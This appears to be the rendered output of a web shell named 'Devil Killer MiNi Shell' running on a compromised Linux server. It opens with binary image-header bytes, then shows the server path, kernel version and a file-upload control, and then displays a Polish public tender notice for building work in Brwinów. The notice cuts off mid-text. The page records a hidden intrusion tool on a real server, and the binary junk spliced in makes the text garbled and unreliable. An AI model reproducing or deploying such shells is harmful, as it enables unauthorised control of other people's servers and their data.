JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220914/0034842901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa wejścia i recepcji w budynku w związku z koniecznością dostosowania do wymogów p.poż. w budynku Centrum w Brwinowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Doradztwa Rolniczego w Brwinowie</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Centrala w Brwinowie, Oddział w Krakowie, Oddział w Poznaniu, Oddział w Radomiu,Oddział w Warszawie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015900539</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Pszczelińska 99</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Brwinów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-840</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.brwinow@cdr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://cdr.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa wejścia i recepcji w budynku w związku z koniecznością dostosowania do wymogów p.poż. w budynku Centrum w Brwinowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d61286dd-3436-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00348429</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00071827/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Przebudowa wejscia i recepcji w budynku w związku z koniecznością dostosowania do wymogów p.poż. w budynku Centrum w Brwinowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://cdrbrwinow. ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w przedmiotowym postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana<br/>informacji oraz przekazywanie dokumentów i oświadczeń między Zamawiającym a Wykonawcami, z<br/>uwzględnieniem wyjątków określonych w ustawie, odbywa się drogą elektroniczną - przy użyciu środków<br/>komunikacji elektronicznej za pośrednictwem Platformy Zakupowej e-Zamawiający, zwanej dalej:<br/>„Platformą” lub „Systemem” – dostępnej na stronie internetowej prowadzonego postępowania<br/>pod adresem: https://cdr-brwinow.ezamawiajacy.pl oraz poczty elektronicznej.<br/><br/>Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu<br/>środków komunikacji elektronicznej, wskazanych w SWZ. Oznacza to, że Zamawiający nie będzie<br/>reagował na inne formy kontaktowania się z nim, w szczególności na kontakt telefoniczny lub/i osobisty w<br/>swojej siedzibie.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, cyfrowych<br/>odwzorowań dokumentów oraz informacji przekazywanych przy ich użyciu zostały opisane w Instrukcji<br/>korzystania z Platformy, dostępnej na stronie internetowej prowadzonego postępowania pod adresem:<br/>https://cdr-brwinow.ezamawiajacy.pl.<br/><br/>Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie,<br/>tj.:<br/>1) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>3) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji<br/>w przypadku Internet Explorer minimalnie wersja 10.0;<br/>4) Włączona obsługa JavaScript;<br/>5) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające prawidłowe złożenie<br/>podpisu elektronicznego:<br/>1) Rekomendowaną przeglądarką do złożenia oferty jest MS Internet Explorer lub Firefox w wersji<br/>wpieranej przez producenta.<br/>2) Uruchomienie oprogramowania do składania podpisu wymaga również zainstalowania Java w wersji<br/>1.8.0_65 lub nowszej, koniecznie w wersji 32-bitowej, pozwalające na przyjmowanie przez użytkownika<br/>sesyjnych plików cookie oraz obsługującej szyfrowanie. Konieczne jest również dodanie adresu witryny<br/>platformy eZamawiający (ezamawiający.pl) do wyjątków (exception site list) w Javie. Uwaga: wymaga<br/>to uprawnień administracyjnych na komputerze. Informacje dotyczące odpowiedniego przygotowania stanowiska są na stronie:<br/>https://oneplace.marketplanet.pl/przygotuj-stanowisko-pc-wykonujac-ponizsze-kroki</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia<br/>2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”:<br/>1) administratorem czyli podmiotem decydującym o celach i środkach przetwarzania Pani/Pana danych<br/>osobowych jest Dyrektor Centrum Doradztwa Rolniczego (zwane dalej „CDR”) z siedzibą w Brwinowie<br/>(05-080) przy ul. Pszczelińskiej;<br/>2) w CDR wyznaczono Inspektora Ochrony Danych Osobowych, z którym może się Pani/Pan skontaktować<br/>w sprawach ochrony i przetwarzania swoich danych osobowych pod adresem e-mail: iodo@cdr.gov.pl lub<br/>pisemnie na adres naszej siedziby wskazany w pkt 1;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z przedmiotowym postępowaniem o udzielenie zamówienia publicznego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74-76 Ustawy z dnia 11 września 2019 r. - Prawo zamówień<br/>publicznych<br/>(tj. Dz.U. 2021 r. poz. 1129), zwanej dalej „ustawą Pzp”;<br/>5) Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78-79 Ustawy Pzp;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach Ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Ustawy<br/>Pzp;<br/>7) posiada Pani/Pan:<br/>· na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących oraz<br/>otrzymania ich kopii;<br/>· na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*;<br/>· na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>· prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8) nie przysługuje Pani/Panu:<br/>· w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>· prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>· na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>9) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>10) podanie przez Pana/Panią danych osobowych jest wymogiem ustawowym. Jest Pan/Pani zobowiązany/a<br/>do ich podania, a konsekwencją niepodania danych osobowych będzie niemożność oceny oferty<br/>i zawarcia umowy;<br/>11) Administrator danych nie mam zamiaru przekazywać danych osobowych do państwa trzeciego lub<br/>organizacji międzynarodowej.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia<br/>2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”:<br/>1) administratorem czyli podmiotem decydującym o celach i środkach przetwarzania Pani/Pana danych<br/>osobowych jest Dyrektor Centrum Doradztwa Rolniczego (zwane dalej „CDR”) z siedzibą w Brwinowie<br/>(05-080) przy ul. Pszczelińskiej;<br/>2) w CDR wyznaczono Inspektora Ochrony Danych Osobowych, z którym może się Pani/Pan skontaktować<br/>w sprawach ochrony i przetwarzania swoich danych osobowych pod adresem e-mail: iodo@cdr.gov.pl lub<br/>pisemnie na adres naszej siedziby wskazany w pkt 1;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z przedmiotowym postępowaniem o udzielenie zamówienia publicznego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74-76 Ustawy z dnia 11 września 2019 r. - Prawo zamówień<br/>publicznych<br/>(tj. Dz.U. 2021 r. poz. 1129), zwanej dalej „ustawą Pzp”;<br/>5) Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78-79 Ustawy Pzp;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach Ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Ustawy<br/>Pzp;<br/>7) posiada Pani/Pan:<br/>· na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących oraz<br/>otrzymania ich kopii;<br/>· na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*;<br/>· na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>· prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8) nie przysługuje Pani/Panu:<br/>· w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>· prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>· na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>9) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>10) podanie przez Pana/Panią danych osobowych jest wymogiem ustawowym. Jest Pan/Pani zobowiązany/a<br/>do ich podania, a konsekwencją niepodania danych osobowych będzie niemożność oceny oferty<br/>i zawarcia umowy;<br/>11) Administrator danych nie mam zamiaru przekazywać danych osobowych do państwa trzeciego lub<br/>organizacji międzynarodowej.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CB.DAG.26.101.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 118424,86 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie przebudowy wejścia i recepcji/punktu informacyjnego w<br/>budynku Centrum Doradztwa Rolniczego w Brwinowie pod adresem: ul. Pszczelińska 99, 05-840 Brwinów<br/>(- dalej ,,Budynek”), zlokalizowanym na nieruchomości stanowiącej działkę o nr ew. 299/7, obręb 16<br/>Brwinów - w związku z koniecznością dostosowania Budynku do wymogów p.poż., w tym realizację robót<br/>budowlanych w zakresie związanym z wymianą ślusarki okiennej na drzwi ewakuacyjne, z wymianą drzwi<br/>wejściowych oraz z aranżacją holu głównego i punktu informacyjnego w Budynku zgodnie z projektami:<br/>Projektem architektoniczno - budowlanym na przebudowę (wymiana ślusarki okiennej na drzwi<br/>ewakuacyjne) i Projektem architektoniczno - budowlanym dla aranżacji wnętrza, a także zgodnie ze<br/>Specyfikacją techniczną wykonania i odbioru robót w obiektach budowlanych (- dalej ,,STWiOR”) -<br/>stanowiącymi załączniki do Specyfikacji Warunków Zamówienia.<br/>2. Przedmiot zamówienia obejmuje w szczególności wykonanie następujących robót w Budynku:<br/>a) demontaż ślusarki okiennej i drzwiowej;<br/>b) wykucie podokiennika okiennego;<br/>c) demontaż elementów wyposażenia stałego i ruchomego holu (parter Budynku);<br/>d) montaż drzwi ewakuacyjnych i drzwi wejściowych;<br/>e) montaż wyposażenia stałego holu;<br/>f) szpachlowanie i malowanie ścian i sufitu;<br/>g) wykonanie wylewki samopoziomującej i okładziny z płytek ceramicznych posadzki;<br/>dostawę i montaż wycieraczki systemowej;<br/>i) montaż elementów aranżacji wnętrz i istniejących elementów wyposażenia w nowych lokalizacjach<br/>w holu;<br/>j) prace wykończeniowe.<br/>3. Szczegółowy zakres przedmiotu zamówienia/robót określa Opis przedmiotu zamówienia - zawarty w:<br/>1) Dokumentacji Projektowej (DP), obejmującej Projekty architektoniczno – budowlane, w tym rysunki<br/>techniczne oraz Przedmiar robót;<br/>2) ,,STWiOR”.<br/>4. Przedmiot zamówienia podlega wykonaniu w skoordynowaniu z pozostałymi elementami Budynku oraz<br/>z uwzględnieniem wymogów w zakresie bhp, ochrony przeciwpożarowej zgodnie z DP.<br/>5. Realizacja przedmiotu zamówienia odbywać się będzie w czynnym/użytkowanym Budynku, co<br/>Wykonawca obowiązany jest uwzględnić przy organizacji wykonywania robót objętych zamówieniem oraz<br/>prowadzić roboty<br/>w sposób nie zakłócający korzystania z Budynku przez jego użytkowników i nie kolidujący/jak najmniej<br/>uciążliwy dla działalności Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45432100-5 - Kładzenie i wykładanie podłóg</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający za najkorzystniejszą uzna ofertę, która nie podlega odrzuceniu oraz uzyska największą<br/>całkowitą liczbę punktów obliczoną z dokładnością do dwóch miejsc po przecinku w oparciu o wyżej<br/>podane kryterium wyboru, wg następującego wzoru: Oferta najkorzystniejsza = C + T</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają łącznie następujące warunki:<br/>1)Nie podlegają wykluczeniu na podstawie art. 108 Ustawy Pzp oraz na podstawie art. 7 ust. 1 ustawy z<br/>dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835);<br/>2) Spełniają warunki udziału w postępowaniu dotyczące kompetencji lub uprawnienia do prowadzenia<br/>określonej działalności zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie wyznacza<br/>szczegółowego warunku w tym zakresie;<br/>3) Spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej: Zamawiający<br/>uzna za spełniony warunek, jeżeli Wykonawca wykaże łącznie, że:<br/>a) w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wykonał co najmniej dwa (2) zamówienia obejmujące remont<br/>lub przebudowę czynnego obiektu użyteczności publicznej o wartości co najmniej 100.000,00 zł<br/>(słownie: sto tysięcy złotych) brutto każde zamówienie;<br/>Budynek użyteczności publicznej to budynek w rozumieniu § 3 pkt. 6) Rozporządzenia Ministra<br/>Infrastruktury w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie<br/>z dnia 12 kwietnia 2002 r. tj. z dnia 17 lipca 2015 r. (Dz.U. z 2015 r. poz. 1422 ze zm.)<br/>W przypadku, gdy wartość wykazywanych umów (zamówień) jest określona w innej walucie niż złoty<br/>polski, Zamawiający dokona przeliczenia tej wartości na złoty polski na podstawie średniego kursu<br/>złotego w stosunku do walut obcych określonego w tabeli kursów średnich NBP z dnia publikacji<br/>ogłoszenia o zamówieniu.<br/>b) dysponuje lub będzie dysponować: kierownikiem budowy (1 osoba) tj. osobą: posiadającą uprawnienia<br/>budowlane do kierowania robotami bez ograniczeń w specjalności konstrukcyjno-budowlanej wydane na<br/>podstawie ustawy z dnia 7 lipca 1994 r. - Prawo budowlane. Zamawiający dopuszcza uprawnienia<br/>odpowiadające wymaganym, które zostały wydane na podstawie wcześniej obowiązujących przepisów<br/>oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego 